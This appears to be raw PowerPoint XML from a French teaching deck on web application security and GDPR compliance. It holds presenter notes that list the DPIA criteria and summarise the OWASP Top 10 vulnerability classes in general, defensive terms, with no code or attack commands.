                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Par groupe de 2, une restitution écrite et orale de 15 minutes.</a:t>
            </a:r>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55</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36907971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a:solidFill>
                  <a:srgbClr val="00292D"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Livrables attendus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dirty="0">
              <a:solidFill>
                <a:srgbClr val="00292D"/>
              </a:solidFill>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a:solidFill>
                  <a:srgbClr val="00292D"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Par groupe de 2, une restitution écrite et orale de 15 minutes.</a:t>
            </a:r>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56</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4104024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47ED0-5476-4765-7ED0-6C9509B03E3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53125B-A5D2-071F-2997-6E958C7C849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EF10DDD-2D32-C8B9-2A64-B3546660FA16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Car l’application marche malgré tout... Et on manque souvent de temps pour sécuriser / faire un audit de sécurité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sa BDD, ses accès. Récupération, suppression, altération..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>2FA</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 n’y en a pas. Malgré les termes qui laissent penser le contraire. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0F7ECA-7841-BE16-646B-7750C9A42219}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B18B3120-E766-4D6A-8CD1-8FAF9E736F7D}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38515437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FFB1EAC-BEE3-450C-8EEA-9B42598B1859}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5243755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s’agit de se mettre en route vers la conformité, il s’agit d’un processus d’amélioration continue.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1. À l’aide du diagnostic réalisé, nous pouvons </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>définir un plan d’action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>2. Le respectant du plan et l’anticipation va permettre de gagner du temps sur le développement ou l’amélioration.</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3 : Reste après à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>identifier les sujets critiques et à enclencher les actions les plus urgentes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Si votre traitement rencontre au moins 2 de ces critères, alors il est vivement conseillé de faire une AIPD :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Evaluation ou notation;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Décision automatisée avec effet juridique ou effet similaire significatif;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surveillance systématique ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Données sensibles ou données à caractère hautement personnel ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Données personnelles traitées à grande échelle ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Croisement d’ensembles de données ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Données concernant des personnes vulnérables ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Usage innovant ou application de nouvelles solutions technologiques ou organisationnelles ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Exclusion du bénéfice d’un droit, d’un service ou contrat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>4 : Pour prouver votre conformité au règlement, vous devez constituer et regrouper la documentation nécessaire.</a:t>
            </a:r>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58</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18780101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16B37-E9C5-585A-7893-CDCE5874A06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E53BE1A-6D94-0B08-2C9F-88172FFB226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4B246C4-B84B-1B74-593B-96AAD2987E2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FAE397C-36CF-D234-1615-2FB1B5E23F4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4FFB1EAC-BEE3-450C-8EEA-9B42598B1859}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29189508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60</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21620782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3075C5D-0494-4C4F-8019-17306A4C173E}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36797447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FFB1EAC-BEE3-450C-8EEA-9B42598B1859}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32590955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 Les failles d'injection, telles que l'injection SQL, NoSQL, OS et LDAP, se produisent lorsque des données non fiables sont envoyées à un interpréteur dans le cadre d'une commande ou d'une requête. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les données hostiles de l'attaquant peuvent inciter l'interpréteur à exécuter des commandes non souhaitées ou à accéder à des données sans autorisation appropriée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>2. Les fonctions d'application liées à l'authentification et à la gestion des sessions sont souvent mises en œuvre de manière incorrecte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Compromettre les mots de passe, les clés ou les jetons de session, ou d'exploiter d'autres failles pour prendre l'identité d'autres utilisateurs de manière temporaire ou permanente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>3. De nombreuses applications Web et API ne protègent pas correctement les données sensibles, telles que les données financières, les données de santé et les informations nominatives. Les attaquants peuvent voler ou modifier ces données faiblement protégées pour commettre des fraudes à la carte de crédit, des vols d'identité ou d'autres crimes. Les données sensibles peuvent être compromises sans protection supplémentaire, comme le cryptage au repos ou en transit, et nécessitent des précautions particulières lorsqu'elles sont échangées avec le navigateur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>4. De nombreux processeurs XML anciens ou mal configurés évaluent les références aux entités externes dans les documents XML. Les entités externes peuvent être utilisées pour divulguer des fichiers internes à l'aide du gestionnaire URI de fichiers, des partages de fichiers internes, l'analyse de ports internes, l'exécution de code à distance et des attaques par déni de service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>5. Les restrictions sur ce que les utilisateurs authentifiés sont autorisés à faire ne sont souvent pas correctement appliquées. Les attaquants peuvent exploiter ces failles pour accéder à des fonctionnalités et/ou des données non autorisées, telles que l'accès aux comptes d'autres utilisateurs, la visualisation de fichiers sensibles, la modification des données d'autres utilisateurs, la modification des droits d'accès, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>6. La mauvaise configuration de la sécurité est le problème le plus fréquemment rencontré. Elle résulte généralement de configurations par défaut non sécurisées, de configurations incomplètes ou ad hoc, d'un stockage en nuage ouvert, d'en-têtes HTTP mal configurés et de messages d'erreur verbeux contenant des informations sensibles. Non seulement tous les systèmes d'exploitation, les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, les bibliothèques et les applications doivent être configurés de manière sécurisée, mais ils doivent être patchés/mises à niveau en temps opportun.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>7. Les failles XSS se produisent chaque fois qu'une application inclut des données non fiables dans une nouvelle page Web sans validation ou échappement approprié, ou met à jour une page Web existante avec des données fournies par l'utilisateur en utilisant une API de navigateur qui peut créer du HTML ou du JavaScript. XSS permet aux attaquants d'exécuter des scripts dans le navigateur de la victime, ce qui peut détourner les sessions des utilisateurs, défigurer les sites web ou rediriger l'utilisateur vers des sites malveillants.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>8. Une désérialisation non sécurisée conduit souvent à l'exécution de code à distance. Même si les défauts de désérialisation n'entraînent pas l'exécution de code à distance, ils peuvent être utilisés pour réaliser des attaques, notamment des attaques par rejeu, des attaques par injection et des attaques par élévation de privilèges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>9. Les composants, tels que les bibliothèques, les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et autres modules logiciels, s'exécutent avec les mêmes privilèges que l'application. Si un composant vulnérable est exploité, une telle attaque peut faciliter de graves pertes de données ou la prise de contrôle du serveur. Les applications et les API utilisant des composants présentant des vulnérabilités connues peuvent miner les défenses de l'application et permettre diverses attaques et incidences.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>10. Une journalisation et une surveillance insuffisantes, associées à une intégration manquante ou inefficace avec la réponse aux incidents, permettent aux attaquants d'attaquer davantage les systèmes, de maintenir la persistance, de pivoter vers plus de systèmes et d'altérer, extraire ou détruire les données. La plupart des études sur les violations montrent que le temps de détection d'une violation est supérieur à 200 jours, généralement détecté par des parties externes plutôt que par des processus ou une surveillance internes.</a:t>
            </a:r>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63</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22821976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 Les failles d'injection, telles que l'injection SQL, NoSQL, OS et LDAP, se produisent lorsque des données non fiables sont envoyées à un interpréteur dans le cadre d'une commande ou d'une requête. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les données hostiles de l'attaquant peuvent inciter l'interpréteur à exécuter des commandes non souhaitées ou à accéder à des données sans autorisation appropriée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>2. Les fonctions d'application liées à l'authentification et à la gestion des sessions sont souvent mises en œuvre de manière incorrecte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Compromettre les mots de passe, les clés ou les jetons de session, ou d'exploiter d'autres failles pour prendre l'identité d'autres utilisateurs de manière temporaire ou permanente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>3. De nombreuses applications Web et API ne protègent pas correctement les données sensibles, telles que les données financières, les données de santé et les informations nominatives. Les attaquants peuvent voler ou modifier ces données faiblement protégées pour commettre des fraudes à la carte de crédit, des vols d'identité ou d'autres crimes. Les données sensibles peuvent être compromises sans protection supplémentaire, comme le cryptage au repos ou en transit, et nécessitent des précautions particulières lorsqu'elles sont échangées avec le navigateur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>4. De nombreux processeurs XML anciens ou mal configurés évaluent les références aux entités externes dans les documents XML. Les entités externes peuvent être utilisées pour divulguer des fichiers internes à l'aide du gestionnaire URI de fichiers, des partages de fichiers internes, l'analyse de ports internes, l'exécution de code à distance et des attaques par déni de service.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>5. Les restrictions sur ce que les utilisateurs authentifiés sont autorisés à faire ne sont souvent pas correctement appliquées. Les attaquants peuvent exploiter ces failles pour accéder à des fonctionnalités et/ou des données non autorisées, telles que l'accès aux comptes d'autres utilisateurs, la visualisation de fichiers sensibles, la modification des données d'autres utilisateurs, la modification des droits d'accès, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>6. La mauvaise configuration de la sécurité est le problème le plus fréquemment rencontré. Elle résulte généralement de configurations par défaut non sécurisées, de configurations incomplètes ou ad hoc, d'un stockage en nuage ouvert, d'en-têtes HTTP mal configurés et de messages d'erreur verbeux contenant des informations sensibles. Non seulement tous les systèmes d'exploitation, les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, les bibliothèques et les applications doivent être configurés de manière sécurisée, mais ils doivent être patchés/mises à niveau en temps opportun.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>7. Les failles XSS se produisent chaque fois qu'une application inclut des données non fiables dans une nouvelle page Web sans validation ou échappement approprié, ou met à jour une page Web existante avec des données fournies par l'utilisateur en utilisant une API de navigateur qui peut créer du HTML ou du JavaScript. XSS permet aux attaquants d'exécuter des scripts dans le navigateur de la victime, ce qui peut détourner les sessions des utilisateurs, défigurer les sites web ou rediriger l'utilisateur vers des sites malveillants.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>8. Une désérialisation non sécurisée conduit souvent à l'exécution de code à distance. Même si les défauts de désérialisation n'entraînent pas l'exécution de code à distance, ils peuvent être utilisés pour réaliser des attaques, notamment des attaques par rejeu, des attaques par injection et des attaques par élévation de privilèges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>9. Les composants, tels que les bibliothèques, les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et autres modules logiciels, s'exécutent avec les mêmes privilèges que l'application. Si un composant vulnérable est exploité, une telle attaque peut faciliter de graves pertes de données ou la prise de contrôle du serveur. Les applications et les API utilisant des composants présentant des vulnérabilités connues peuvent miner les défenses de l'application et permettre diverses attaques et incidences.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>10. Une journalisation et une surveillance insuffisantes, associées à une intégration manquante ou inefficace avec la réponse aux incidents, permettent aux attaquants d'attaquer davantage les systèmes, de maintenir la persistance, de pivoter vers plus de systèmes et d'altérer, extraire ou détruire les données. La plupart des études sur les violations montrent que le temps de détection d'une violation est supérieur à 200 jours, généralement détecté par des parties externes plutôt que par des processus ou une surveillance internes.</a:t>
            </a:r>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64</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="802062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 Les failles d'injection, telles que l'injection SQL, NoSQL, OS et LDAP, se produisent lorsque des données non fiables sont envoyées à un interpréteur dans le cadre d'une commande ou d'une requête. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les données hostiles de l'attaquant peuvent inciter l'interpréteur à exécuter des commandes non souhaitées ou à accéder à des données sans autorisation appropriée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>2. Les fonctions d'application liées à l'authentification et à la gestion des sessions sont souvent mises en œuvre de manière incorrecte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Compromettre les mots de passe, les clés ou les jetons de session, ou d'exploiter d'autres failles pour prendre l'identité d'autres utilisateurs de manière temporaire ou permanente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>3. De nombreuses applications Web et API ne protègent pas correctement les données sensibles, telles que les données financières, les données de santé et les informations nominatives. Les attaquants peuvent voler ou modifier ces données faiblement protégées pour commettre des fraudes à la carte de crédit, des vols d'identité ou d'autres crimes. Les données sensibles peuvent être compromises sans protection supplémentaire, comme le cryptage au repos ou en transit, et nécessitent des précautions particulières lorsqu'elles sont échangées avec le navigateur.</a:t>
            </a:r>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65</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32687550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4. De nombreux processeurs XML anciens ou mal configurés évaluent les références aux entités externes dans les documents XML. Les entités externes peuvent être utilisées pour divulguer des fichiers internes à l'aide du gestionnaire URI de fichiers, des partages de fichiers internes, l'analyse de ports internes, l'exécution de code à distance et des attaques par déni de service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>5. Les restrictions sur ce que les utilisateurs authentifiés sont autorisés à faire ne sont souvent pas correctement appliquées. Les attaquants peuvent exploiter ces failles pour accéder à des fonctionnalités et/ou des données non autorisées, telles que l'accès aux comptes d'autres utilisateurs, la visualisation de fichiers sensibles, la modification des données d'autres utilisateurs, la modification des droits d'accès, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>6. La mauvaise configuration de la sécurité est le problème le plus fréquemment rencontré. Elle résulte généralement de configurations par défaut non sécurisées, de configurations incomplètes ou ad hoc, d'un stockage en nuage ouvert, d'en-têtes HTTP mal configurés et de messages d'erreur verbeux contenant des informations sensibles. Non seulement tous les systèmes d'exploitation, les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, les bibliothèques et les applications doivent être configurés de manière sécurisée, mais ils doivent être patchés/mises à niveau en temps opportun.</a:t>
            </a:r>
          </a:p>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66</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3180354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Cahier des charges va vous permettre de définir plusieurs points </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ce qu’il doit être protégé dans l’entreprise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le respect de loi vis-à-vis du système d’information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Soit des règles et des procédures établis face à un type d’incident</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Définir les personnes responsable et les actions à entreprendre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Surtout la détermination du périmètre de sécurité</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>&gt;&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
